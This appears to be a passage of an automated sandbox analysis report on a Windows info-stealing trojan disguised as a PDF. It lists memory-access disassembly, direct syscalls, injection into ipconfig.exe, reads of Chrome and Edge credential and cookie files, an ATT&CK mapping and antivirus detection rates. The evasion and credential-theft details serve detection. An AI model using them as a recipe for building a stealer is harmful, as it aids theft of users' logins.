        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627623 mov eax, dword ptr fs:[00000030h]2_2_32627623
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32620630 mov eax, dword ptr fs:[00000030h]2_2_32620630
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650630 mov eax, dword ptr fs:[00000030h]2_2_32650630
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D600 mov eax, dword ptr fs:[00000030h]2_2_3264D600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D600 mov eax, dword ptr fs:[00000030h]2_2_3264D600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF607 mov eax, dword ptr fs:[00000030h]2_2_326DF607
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265360F mov eax, dword ptr fs:[00000030h]2_2_3265360F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4600 mov eax, dword ptr fs:[00000030h]2_2_326F4600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326196E0 mov eax, dword ptr fs:[00000030h]2_2_326196E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326196E0 mov eax, dword ptr fs:[00000030h]2_2_326196E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262C6E0 mov eax, dword ptr fs:[00000030h]2_2_3262C6E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326466E0 mov eax, dword ptr fs:[00000030h]2_2_326466E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326466E0 mov eax, dword ptr fs:[00000030h]2_2_326466E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326206CF mov eax, dword ptr fs:[00000030h]2_2_326206CF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EA6C0 mov eax, dword ptr fs:[00000030h]2_2_326EA6C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D6D0 mov eax, dword ptr fs:[00000030h]2_2_3264D6D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E86A8 mov eax, dword ptr fs:[00000030h]2_2_326E86A8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E86A8 mov eax, dword ptr fs:[00000030h]2_2_326E86A8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF68C mov eax, dword ptr fs:[00000030h]2_2_326DF68C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32628690 mov eax, dword ptr fs:[00000030h]2_2_32628690
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269D69D mov eax, dword ptr fs:[00000030h]2_2_3269D69D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32632760 mov ecx, dword ptr fs:[00000030h]2_2_32632760
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650774 mov eax, dword ptr fs:[00000030h]2_2_32650774
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624779 mov eax, dword ptr fs:[00000030h]2_2_32624779
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624779 mov eax, dword ptr fs:[00000030h]2_2_32624779
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32653740 mov eax, dword ptr fs:[00000030h]2_2_32653740
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265174A mov eax, dword ptr fs:[00000030h]2_2_3265174A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CE750 mov eax, dword ptr fs:[00000030h]2_2_326CE750
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623722 mov eax, dword ptr fs:[00000030h]2_2_32623722
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623722 mov eax, dword ptr fs:[00000030h]2_2_32623722
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D700 mov ecx, dword ptr fs:[00000030h]2_2_3262D700
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E970B mov eax, dword ptr fs:[00000030h]2_2_326E970B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E970B mov eax, dword ptr fs:[00000030h]2_2_326E970B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262471B mov eax, dword ptr fs:[00000030h]2_2_3262471B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262471B mov eax, dword ptr fs:[00000030h]2_2_3262471B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF717 mov eax, dword ptr fs:[00000030h]2_2_326DF717
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264E7E0 mov eax, dword ptr fs:[00000030h]2_2_3264E7E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326277F9 mov eax, dword ptr fs:[00000030h]2_2_326277F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326277F9 mov eax, dword ptr fs:[00000030h]2_2_326277F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF7CF mov eax, dword ptr fs:[00000030h]2_2_326DF7CF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326207A7 mov eax, dword ptr fs:[00000030h]2_2_326207A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F17BC mov eax, dword ptr fs:[00000030h]2_2_326F17BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB781 mov eax, dword ptr fs:[00000030h]2_2_326FB781
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB781 mov eax, dword ptr fs:[00000030h]2_2_326FB781

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtOpenKeyEx: Direct from: 0x778D2ABC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQueryInformationProcess: Direct from: 0x778D2B46
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtResumeThread: Direct from: 0x778D2EDC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtCreateUserProcess: Direct from: 0x778D363C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtDelayExecution: Direct from: 0x778D2CFC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtReadFile: Direct from: 0x778D29FC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQuerySystemInformation: Direct from: 0x778D2D1C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtWriteVirtualMemory: Direct from: 0x778D2D5C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtMapViewOfSection: Direct from: 0x778D2C3C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtResumeThread: Direct from: 0x778D35CC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtAllocateVirtualMemory: Direct from: 0x778D2B1C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtSetInformationProcess: Direct from: 0x778D2B7C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtNotifyChangeKey: Direct from: 0x778D3B4C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtReadVirtualMemory: Direct from: 0x778D2DAC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtSetInformationThread: Direct from: 0x778C6319
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQueryInformationToken: Direct from: 0x778D2BCC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtAllocateVirtualMemory: Direct from: 0x778D3BBC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtOpenFile: Direct from: 0x778D2CEC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtCreateFile: Direct from: 0x778D2F0C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQuerySystemInformation: Direct from: 0x778D47EC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQueryVolumeInformationFile: Direct from: 0x778D2E4C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtDeviceIoControlFile: Direct from: 0x778D2A0C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtAllocateVirtualMemory: Direct from: 0x778D2B0C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtOpenSection: Direct from: 0x778D2D2C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtSetInformationThread: Direct from: 0x778D2A6C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtQueryAttributesFile: Direct from: 0x778D2D8C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtClose: Direct from: 0x778D2A8C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtCreateKey: Direct from: 0x778D2B8C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtWriteVirtualMemory: Direct from: 0x778D482C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtProtectVirtualMemory: Direct from: 0x778D2EBC
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe NtAllocateVirtualMemory: Direct from: 0x778D480C
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: read write
        Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: unknown
        Source: C:\Users\user\Desktop\-pdf.bat.exe Process created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: unknown unknown
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 0_2_00403804 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx

        Stealing of Sensitive Information

        Source: Yara match File source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 212 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Behavior graph (ID: 1525408, Sample: -pdf.bat.exe, Start date: 04/10/2024, Architecture: WINDOWS, Score: 100). Process chain: -pdf.bat.exe (dropped C:\Users\user\AppData\Local\...\System.dll, PE32) -> -pdf.bat.exe (started) -> ijDRAEBvXKu.exe (injected) -> ipconfig.exe (started).

        Source | Detection | Scanner | Label | Link
        -pdf.bat.exe | 24% | ReversingLabs | Win32.Trojan.InjectorX |
        -pdf.bat.exe | 26% | Virustotal | | Browse
        -pdf.bat.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
